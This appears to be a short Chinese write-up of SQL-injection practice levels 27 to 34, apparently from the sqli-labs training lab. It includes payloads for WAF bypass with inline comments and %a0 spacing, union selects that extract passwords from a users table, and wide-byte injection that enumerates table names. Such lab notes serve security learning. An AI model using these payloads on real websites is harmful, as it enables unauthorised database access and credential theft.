第二十七关
第二十七a关
第二十八关
第二十八a
第二十九关
第三十关
第三十一关
第三十二关
第三十三关
第三十四关
第二十七关
这关把union select 也过滤了这里我是大小写绕过
库名
表名
数据
第二十七a关
双引号
第二十八关
闭合符 ’)
第二十八a
跟二十八一样
第二十九关
绕过waf
id=1 /*!union*/ /*!select*/ 1,2,3
第三十关
双引号
?id=-1"%a0/*!%a0union*/%a0/*!%a0select*/%a01,group_concat(password),3%a0from%a0users%a0where%a0"1
第三十一关
双引号括号
?id=-1")%a0/*!%a0union*/%a0/*!%a0select*/%a01,group_concat(password),3%a0from%a0users%a0where%a0("1
第三十二关
宽字节注入
?id=-1%df' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- -
第三十三关
我的做法也是宽字节跟上一关一样
第三十四关
post请求抓个包同上